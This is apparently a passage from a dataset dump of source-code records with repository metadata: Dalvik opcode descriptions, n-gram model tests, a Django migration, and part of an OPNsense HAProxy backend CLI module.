"iget-byte":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-char":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-short":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-wide":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-object":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-boolean":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-byte":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-char":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-short":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-wide":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-object":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-boolean":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-byte":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-char":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-short":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-wide":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-object":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-boolean":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-byte":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-char":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-short":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"invoke-virtual":"invoke-virtual is used to invoke a normal virtual method (a method that is not private, static, or final, and is also not a constructor)",
"invoke-super":"invoke-super is used to invoke the closest superclass's virtual method (as opposed to the one with the same method_id in the calling class). The same method restrictions hold as for invoke-virtual.",
"invoke-direct":"invoke-direct is used to invoke a non-static direct method (that is, an instance method that is by its nature non-overridable, namely either a private instance method or a constructor).",
"invoke-static":"invoke-static is used to invoke a static method (which is always considered a direct method).",
"invoke-interface":"invoke-interface is used to invoke an interface method, that is, on an object whose concrete class isn't known, using a method_id that refers to an interface.",
"neg-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"not-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"neg-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"not-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"neg-float":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"neg-double":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-float":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-double":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"long-to-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"long-to-float":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"long-to-double":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"float-to-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"float-to-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"float-to-double":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"double-to-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"double-to-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"double-to-float":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-byte":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-char":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-short":"Perform the identified unary operation on the source register, storing the result in the destination register."
}
| 147.858156 | 709 | 0.776429 | 3,171 | 20,848 | 5.099338 | 0.114475 | 0.084416 | 0.077922 | 0.051948 | 0.746259 | 0.730736 | 0.722696 | 0.719728 | 0.715028 | 0.709091 | 0 | 0.001774 | 0.161886 | 20,848 | 140 | 710 | 148.914286 | 0.923654 | 0.030363 | 0 | 0 | 0 | 0.508475 | 0.927815 | 0.001238 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0fd12895756d2559c393960fd7c10eb3b3d3c084 | 114 | py | Python | python/lib/lib_care/model/__init__.py | timtyree/bgmc | 891e003a9594be9e40c53822879421c2b8c44eed | [
"MIT"
] | null | null | null | python/lib/lib_care/model/__init__.py | timtyree/bgmc | 891e003a9594be9e40c53822879421c2b8c44eed | [
"MIT"
] | null | null | null | python/lib/lib_care/model/__init__.py | timtyree/bgmc | 891e003a9594be9e40c53822879421c2b8c44eed | [
"MIT"
] | null | null | null | from .LR_model_optimized import *
from .LR_model import *
from .minimal_model import *
from .recall_fits import *
| 22.8 | 33 | 0.789474 | 17 | 114 | 5 | 0.470588 | 0.352941 | 0.258824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 114 | 4 | 34 | 28.5 | 0.867347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0fd4252d39b73ef147d5405084543b8526eb1b4b | 8,272 | py | Python | book-code/numpy-ml/numpy_ml/tests/test_ngram.py | yangninghua/code_library | b769abecb4e0cbdbbb5762949c91847a0f0b3c5a | [
"MIT"
] | null | null | null | book-code/numpy-ml/numpy_ml/tests/test_ngram.py | yangninghua/code_library | b769abecb4e0cbdbbb5762949c91847a0f0b3c5a | [
"MIT"
] | null | null | null | book-code/numpy-ml/numpy_ml/tests/test_ngram.py | yangninghua/code_library | b769abecb4e0cbdbbb5762949c91847a0f0b3c5a | [
"MIT"
] | null | null | null | # flake8: noqa
import tempfile
import nltk
import numpy as np
from ..preprocessing.nlp import tokenize_words
from ..ngram import AdditiveNGram, MLENGram
from ..utils.testing import random_paragraph
class MLEGold:
def __init__(
self, N, K=1, unk=True, filter_stopwords=True, filter_punctuation=True
):
self.N = N
self.K = K
self.unk = unk
self.filter_stopwords = filter_stopwords
self.filter_punctuation = filter_punctuation
self.hyperparameters = {
"N": N,
"K": K,
"unk": unk,
"filter_stopwords": filter_stopwords,
"filter_punctuation": filter_punctuation,
}
def train(self, corpus_fp, vocab=None, encoding=None):
N = self.N
H = self.hyperparameters
models, counts = {}, {}
grams = {n: [] for n in range(1, N + 1)}
gg = {n: [] for n in range(1, N + 1)}
filter_punc, filter_stop = H["filter_punctuation"], H["filter_stopwords"]
n_words = 0
tokens = set([])
with open(corpus_fp, "r", encoding=encoding) as text:
for line in text:
words = tokenize_words(line, filter_punc, filter_stop)
if vocab is not None:
words = vocab.filter(words, H["unk"])
if len(words) == 0:
continue
n_words += len(words)
tokens.update(words)
# calculate n, n-1, ... 1-grams
for n in range(1, N + 1):
grams[n].append(
nltk.ngrams(
words,
n,
pad_left=True,
pad_right=True,
left_pad_symbol="<bol>",
right_pad_symbol="<eol>",
)
)
gg[n].extend(
list(
nltk.ngrams(
words,
n,
pad_left=True,
pad_right=True,
left_pad_symbol="<bol>",
right_pad_symbol="<eol>",
)
)
)
for n in range(1, N + 1):
counts[n] = nltk.FreqDist(gg[n])
models[n] = nltk.lm.MLE(order=n)
models[n].fit(grams[n], tokens)
self.counts = counts
self.n_words = n_words
self._models = models
self.n_tokens = len(vocab) if vocab is not None else len(tokens)
def log_prob(self, words, N):
assert N in self.counts, "You do not have counts for {}-grams".format(N)
if N > len(words):
err = "Not enough words for a gram-size of {}: {}".format(N, len(words))
raise ValueError(err)
total_prob = 0
for ngram in nltk.ngrams(words, N):
total_prob += self._log_ngram_prob(ngram)
return total_prob
def _log_ngram_prob(self, ngram):
N = len(ngram)
return self._models[N].logscore(ngram[-1], ngram[:-1])
class AdditiveGold:
def __init__(
self, N, K=1, unk=True, filter_stopwords=True, filter_punctuation=True
):
self.N = N
self.K = K
self.unk = unk
self.filter_stopwords = filter_stopwords
self.filter_punctuation = filter_punctuation
self.hyperparameters = {
"N": N,
"K": K,
"unk": unk,
"filter_stopwords": filter_stopwords,
"filter_punctuation": filter_punctuation,
}
def train(self, corpus_fp, vocab=None, encoding=None):
N = self.N
H = self.hyperparameters
models, counts = {}, {}
grams = {n: [] for n in range(1, N + 1)}
gg = {n: [] for n in range(1, N + 1)}
filter_punc, filter_stop = H["filter_punctuation"], H["filter_stopwords"]
n_words = 0
tokens = set()
with open(corpus_fp, "r", encoding=encoding) as text:
for line in text:
words = tokenize_words(line, filter_punc, filter_stop)
if vocab is not None:
words = vocab.filter(words, H["unk"])
if len(words) == 0:
continue
n_words += len(words)
tokens.update(words)
# calculate n, n-1, ... 1-grams
for n in range(1, N + 1):
grams[n].append(
nltk.ngrams(
words,
n,
pad_left=True,
pad_right=True,
left_pad_symbol="<bol>",
right_pad_symbol="<eol>",
)
)
gg[n].extend(
list(
nltk.ngrams(
words,
n,
pad_left=True,
pad_right=True,
left_pad_symbol="<bol>",
right_pad_symbol="<eol>",
)
)
)
for n in range(1, N + 1):
counts[n] = nltk.FreqDist(gg[n])
models[n] = nltk.lm.Lidstone(order=n, gamma=self.K)
models[n].fit(grams[n], tokens)
self.counts = counts
self._models = models
self.n_words = n_words
self.n_tokens = len(vocab) if vocab is not None else len(tokens)
def log_prob(self, words, N):
assert N in self.counts, "You do not have counts for {}-grams".format(N)
if N > len(words):
err = "Not enough words for a gram-size of {}: {}".format(N, len(words))
raise ValueError(err)
total_prob = 0
for ngram in nltk.ngrams(words, N):
total_prob += self._log_ngram_prob(ngram)
return total_prob
def _log_ngram_prob(self, ngram):
N = len(ngram)
return self._models[N].logscore(ngram[-1], ngram[:-1])
def test_mle():
N = np.random.randint(2, 5)
gold = MLEGold(N, unk=True, filter_stopwords=False, filter_punctuation=False)
mine = MLENGram(N, unk=True, filter_stopwords=False, filter_punctuation=False)
with tempfile.NamedTemporaryFile() as temp:
temp.write(bytes(" ".join(random_paragraph(1000)), encoding="utf-8-sig"))
gold.train(temp.name, encoding="utf-8-sig")
mine.train(temp.name, encoding="utf-8-sig")
for k in mine.counts[N].keys():
if k[0] == k[1] and k[0] in ("<bol>", "<eol>"):
continue
err_str = "{}, mine: {}, gold: {}"
assert mine.counts[N][k] == gold.counts[N][k], err_str.format(
k, mine.counts[N][k], gold.counts[N][k]
)
M = mine.log_prob(k, N)
G = gold.log_prob(k, N) / np.log2(np.e) # convert to log base e
np.testing.assert_allclose(M, G)
print("PASSED")
def test_additive():
K = np.random.rand()
N = np.random.randint(2, 5)
gold = AdditiveGold(
N, K, unk=True, filter_stopwords=False, filter_punctuation=False
)
mine = AdditiveNGram(
N, K, unk=True, filter_stopwords=False, filter_punctuation=False
)
with tempfile.NamedTemporaryFile() as temp:
temp.write(bytes(" ".join(random_paragraph(1000)), encoding="utf-8-sig"))
gold.train(temp.name, encoding="utf-8-sig")
mine.train(temp.name, encoding="utf-8-sig")
for k in mine.counts[N].keys():
if k[0] == k[1] and k[0] in ("<bol>", "<eol>"):
continue
err_str = "{}, mine: {}, gold: {}"
assert mine.counts[N][k] == gold.counts[N][k], err_str.format(
k, mine.counts[N][k], gold.counts[N][k]
)
M = mine.log_prob(k, N)
G = gold.log_prob(k, N) / np.log2(np.e) # convert to log base e
np.testing.assert_allclose(M, G)
print("PASSED")
| 32.439216 | 84 | 0.482955 | 966 | 8,272 | 4.003106 | 0.138716 | 0.062064 | 0.012413 | 0.022757 | 0.922162 | 0.915956 | 0.90768 | 0.896302 | 0.896302 | 0.881045 | 0 | 0.011876 | 0.39942 | 8,272 | 254 | 85 | 32.566929 | 0.766506 | 0.014023 | 0 | 0.827586 | 0 | 0 | 0.058896 | 0 | 0 | 0 | 0 | 0 | 0.029557 | 1 | 0.049261 | false | 0.009852 | 0.029557 | 0 | 0.108374 | 0.009852 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba1c56dc38de5055daa8160ccfd1ba699451221e | 48 | py | Python | sam/__init__.py | idostyle/SAM | 86a06840226d0215a0f156907fe80d391d32608d | [
"Apache-2.0"
] | 2 | 2019-06-18T17:48:10.000Z | 2020-01-03T11:33:32.000Z | sam/__init__.py | idostyle/SAM | 86a06840226d0215a0f156907fe80d391d32608d | [
"Apache-2.0"
] | null | null | null | sam/__init__.py | idostyle/SAM | 86a06840226d0215a0f156907fe80d391d32608d | [
"Apache-2.0"
] | 1 | 2020-01-03T11:33:34.000Z | 2020-01-03T11:33:34.000Z | """Init and import SAM."""
from .sam import SAM
| 16 | 26 | 0.666667 | 8 | 48 | 4 | 0.625 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 48 | 2 | 27 | 24 | 0.8 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e8681a45e147098891ca09f7e31a80ed676fbe8c | 2,132 | py | Python | footballleagues/migrations/0002_auto_20201112_1551.py | RicardoSilveira23/TonicAppChallenge | 961107acbcdd93551bcd1b4b0ecd877fb4a7d813 | [
"MIT"
] | null | null | null | footballleagues/migrations/0002_auto_20201112_1551.py | RicardoSilveira23/TonicAppChallenge | 961107acbcdd93551bcd1b4b0ecd877fb4a7d813 | [
"MIT"
] | null | null | null | footballleagues/migrations/0002_auto_20201112_1551.py | RicardoSilveira23/TonicAppChallenge | 961107acbcdd93551bcd1b4b0ecd877fb4a7d813 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.3 on 2020-11-12 15:51
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("footballleagues", "0001_initial"),
]
operations = [
migrations.RenameField(
model_name="league",
old_name="createdby",
new_name="created_by",
),
migrations.RenameField(
model_name="league",
old_name="createddate",
new_name="created_date",
),
migrations.RenameField(
model_name="league",
old_name="numberofteams",
new_name="number_of_teams",
),
migrations.RenameField(
model_name="league",
old_name="updatedby",
new_name="updated_by",
),
migrations.RenameField(
model_name="league",
old_name="updateddate",
new_name="updated_date",
),
migrations.RenameField(
model_name="player",
old_name="createdby",
new_name="created_by",
),
migrations.RenameField(
model_name="player",
old_name="createddate",
new_name="created_date",
),
migrations.RenameField(
model_name="player",
old_name="updatedby",
new_name="updated_by",
),
migrations.RenameField(
model_name="player",
old_name="updateddate",
new_name="updated_date",
),
migrations.RenameField(
model_name="team",
old_name="createdby",
new_name="created_by",
),
migrations.RenameField(
model_name="team",
old_name="createddate",
new_name="created_date",
),
migrations.RenameField(
model_name="team",
old_name="updatedby",
new_name="updated_by",
),
migrations.RenameField(
model_name="team",
old_name="updateddate",
new_name="updated_date",
),
]
| 26.987342 | 47 | 0.518293 | 183 | 2,132 | 5.743169 | 0.224044 | 0.259753 | 0.321598 | 0.371075 | 0.83254 | 0.83254 | 0.83254 | 0.724072 | 0.667935 | 0.667935 | 0 | 0.0142 | 0.37242 | 2,132 | 78 | 48 | 27.333333 | 0.7713 | 0.021107 | 0 | 0.875 | 1 | 0 | 0.180815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013889 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e8c68ea206c2712a50424edddd28306fbbe07d64 | 40,240 | py | Python | opnsense_cli/commands/plugin/haproxy/backend.py | jan-win1993/opn-cli | 83c4792571dacbe6483722a95276954c7a2d0b3c | [
"BSD-2-Clause"
] | 13 | 2021-05-17T10:42:25.000Z | 2022-02-21T02:10:41.000Z | opnsense_cli/commands/plugin/haproxy/backend.py | jan-win1993/opn-cli | 83c4792571dacbe6483722a95276954c7a2d0b3c | [
"BSD-2-Clause"
] | 14 | 2021-05-17T13:53:27.000Z | 2021-12-16T12:45:44.000Z | opnsense_cli/commands/plugin/haproxy/backend.py | jan-win1993/opn-cli | 83c4792571dacbe6483722a95276954c7a2d0b3c | [
"BSD-2-Clause"
] | 2 | 2021-04-28T08:41:07.000Z | 2022-03-28T10:20:51.000Z | import click
from opnsense_cli.formatters.cli_output import CliOutputFormatter
from opnsense_cli.callbacks.click import \
formatter_from_formatter_name, bool_as_string, available_formats, int_as_string, tuple_to_csv, \
resolve_linked_names_to_uuids
from opnsense_cli.types.click_param_type.int_or_empty import INT_OR_EMPTY
from opnsense_cli.commands.plugin.haproxy import haproxy
from opnsense_cli.api.client import ApiClient
from opnsense_cli.api.plugin.haproxy import Settings, Service
from opnsense_cli.facades.commands.plugin.haproxy.backend import HaproxyBackendFacade
pass_api_client = click.make_pass_decorator(ApiClient)
pass_haproxy_backend_svc = click.make_pass_decorator(HaproxyBackendFacade)
@haproxy.group()
@pass_api_client
@click.pass_context
def backend(ctx, api_client: ApiClient, **kwargs):
"""
Health monitoring and load distribution for servers.
"""
settings_api = Settings(api_client)
service_api = Service(api_client)
ctx.obj = HaproxyBackendFacade(settings_api, service_api)
@backend.command()
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="table",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default=(
"uuid,enabled,name,description,mode,algorithm,Servers,"
"healthCheckEnabled,Healthcheck,persistence,stickiness_pattern"
)
)
@pass_haproxy_backend_svc
def list(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Show all backend
"""
result = haproxy_backend_svc.list_backends()
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@backend.command()
@click.argument('uuid')
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="table",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default=(
"enabled,name,description,mode,algorithm,random_draws,proxyProtocol,linkedServers,"
"linkedResolver,resolverOpts,resolvePrefer,source,"
"healthCheckEnabled,healthCheck,healthCheckLogStatus,checkInterval,checkDownInterval,"
"healthCheckFall,healthCheckRise,linkedMailer,http2Enabled,http2Enabled_nontls,"
"ba_advertised_protocols,persistence,persistence_cookiemode,persistence_cookiename,"
"persistence_stripquotes,stickiness_pattern,stickiness_dataTypes,stickiness_expire,"
"stickiness_size,stickiness_cookiename,stickiness_cookielength,stickiness_connRatePeriod,"
"stickiness_sessRatePeriod,stickiness_httpReqRatePeriod,stickiness_httpErrRatePeriod,"
"stickiness_bytesInRatePeriod,stickiness_bytesOutRatePeriod,basicAuthEnabled,basicAuthUsers,"
"basicAuthGroups,tuning_timeoutConnect,tuning_timeoutCheck,tuning_timeoutServer,"
"tuning_retries,customOptions,tuning_defaultserver,tuning_noport,tuning_httpreuse,tuning_caching,"
"linkedActions,linkedErrorfiles"
),
show_default=True,
)
@pass_haproxy_backend_svc
def show(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Show details for backend
"""
result = haproxy_backend_svc.show_backend(kwargs['uuid'])
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@backend.command()
@click.argument('name')
@click.option(
'--enabled/--no-enabled',
help='Enable or disable this backend.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=True,
)
@click.option(
'--description',
help='Description for this backend pool.',
show_default=True,
default=None,
required=False,
)
@click.option(
'--mode',
help='Set the running mode or protocol of the backend pool.',
type=click.Choice(['http', 'tcp']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='http',
required=True,
)
@click.option(
'--algorithm',
help='Define the load balancing algorithm to be used in a backend pool.',
type=click.Choice(['source', 'roundrobin', 'static-rr', 'leastconn', 'uri', 'random']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='source',
required=True,
)
@click.option(
'--random_draws',
help=(
'When using the Random Balancing Algorithm, this value indicates the number of draws '
'before selecting the least loaded of these servers.'
),
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=2,
required=True,
)
@click.option(
'--proxyProtocol',
help='Enforces use of the PROXY protocol over any connection established to the configured servers.',
type=click.Choice(['', 'v1', 'v2']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None,
required=False,
)
@click.option(
'--linkedServers',
help='Add servers to this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--linkedResolver',
help='Select the custom resolver configuration that should be used for all servers in this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--resolverOpts',
help='Add resolver options.',
type=click.Choice(['', 'allow-dup-ip', 'ignore-weight', 'prevent-dup-ip']),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=[],
required=False,
)
@click.option(
'--resolvePrefer',
help=(
'When DNS resolution is enabled for a server and multiple IP addresses from different families are returned, '
'HAProxy will prefer using an IP address from the selected family.'
),
type=click.Choice(['', 'ipv4', 'ipv6']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None,
required=False,
)
@click.option(
'--source',
help='Sets the source address which will be used when connecting to the server(s).',
show_default=True,
default=None,
required=False,
)
@click.option(
'--healthCheckEnabled/--no-healthCheckEnabled',
help='Enable or disable health checking.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=True,
)
@click.option(
'--healthCheck',
help='Select health check for servers in this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--healthCheckLogStatus/--no-healthCheckLogStatus',
help='Enable to log health check status updates.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--checkInterval',
help=(
'Sets the interval (in milliseconds) for running health checks on all configured servers. '
'This setting takes precedence over default values in health monitors and real servers.'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--checkDownInterval',
help=(
'Sets the interval (in milliseconds) for running health checks on a configured server when the server state '
'is DOWN. If it is not set HAProxy uses the check interval.'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--healthCheckFall',
help='The number of consecutive unsuccessful health checks before a server is considered as unavailable.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None,
required=False,
)
@click.option(
'--healthCheckRise',
help='The number of consecutive successful health checks before a server is considered as available.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None,
required=False,
)
@click.option(
'--linkedMailer',
help='Select an e-mail alert configuration. An e-mail is sent when the state of a server changes.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--http2Enabled/--no-http2Enabled',
help='Enable support for end-to-end HTTP/2 communication.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--http2Enabled_nontls/--no-http2Enabled_nontls',
help='Enable support for HTTP/2 even if TLS is not enabled.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--ba_advertised_protocols',
help=(
'When using the TLS ALPN extension, HAProxy advertises the specified protocol list as supported on top of ALPN.'
' TLS must be enabled.'
),
type=click.Choice(['', 'h2', 'http11', 'http10']),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=['h2', 'http11'],
required=False,
)
@click.option(
'--persistence',
help=(
'Choose how HAProxy should track user-to-server mappings. '
'Stick-table persistence works with all protocols, but is broken in multi-process and multithreaded modes. '
'Cookie-based persistence only works with HTTP/HTTPS protocols.'
),
type=click.Choice(['', 'sticktable', 'cookie']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='sticktable',
required=False,
)
@click.option(
'--persistence_cookiemode',
help=(
'Usually it is better to reuse an existing cookie. '
'In this case HAProxy prefixes the cookie with the required information.'
),
type=click.Choice(['piggyback', 'new']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='piggyback',
required=True,
)
@click.option(
'--persistence_cookiename',
help='Cookie name to use for persistence.',
show_default=True,
default='SRVCOOKIE',
required=False,
)
@click.option(
'--persistence_stripquotes/--no-persistence_stripquotes',
help='Enable to automatically strip quotes from the cookie value.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=True,
)
@click.option(
'--stickiness_pattern',
help='Choose a request pattern to associate a user to a server.',
type=click.Choice(['', 'sourceipv4', 'sourceipv6', 'cookievalue', 'rdpcookie']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='sourceipv4',
required=False,
)
@click.option(
'--stickiness_dataTypes',
help=(
'This is used to store additional information in the stick-table. '
'It may be used by ACLs in order to control various criteria related to the activity of the client matching '
'the stick-table. Note that this directly impacts memory usage.'
),
type=click.Choice(
[
'', 'conn_cnt', 'conn_cur', 'conn_rate', 'sess_cnt', 'sess_rate', 'http_req_cnt', 'http_req_rate',
'http_err_cnt', 'http_err_rate', 'bytes_in_cnt', 'bytes_in_rate', 'bytes_out_cnt', 'bytes_out_rate'
]
),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=[],
required=False,
)
@click.option(
'--stickiness_expire',
help=(
'This configures the maximum duration of an entry in the stick-table since it was last created, refreshed '
'or matched. The maximum duration is slightly above 24 days. Enter a number followed by one of the supported '
'suffixes "d" (days), "h" (hour), "m" (minute), "s" (seconds), "ms" (miliseconds).'
),
show_default=True,
default='30m',
required=True,
)
@click.option(
'--stickiness_size',
help=(
'This configures the maximum number of entries that can fit in the table. '
'This value directly impacts memory usage. '
'Count approximately 50 bytes per entry, plus the size of a string if any. '
'Enter a number followed by one of the supported suffixes "k", "m", "g".'
),
show_default=True,
default='50k',
required=True,
)
@click.option(
'--stickiness_cookiename',
help='Cookie name to use for stick table.',
show_default=True,
default=None,
required=False,
)
@click.option(
'--stickiness_cookielength',
help='The maximum number of characters that will be stored in the stick table.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None,
required=False,
)
@click.option(
'--stickiness_connRatePeriod',
help=(
'The length of the period over which the average is measured. It reports the average incoming connection rate '
'over that period, in connections per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='10s',
required=False,
)
@click.option(
'--stickiness_sessRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average incoming session rate over that period, '
'in sessions per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='10s',
required=False,
)
@click.option(
'--stickiness_httpReqRatePeriod',
help=(
'The length of the period over which the average is measured. '
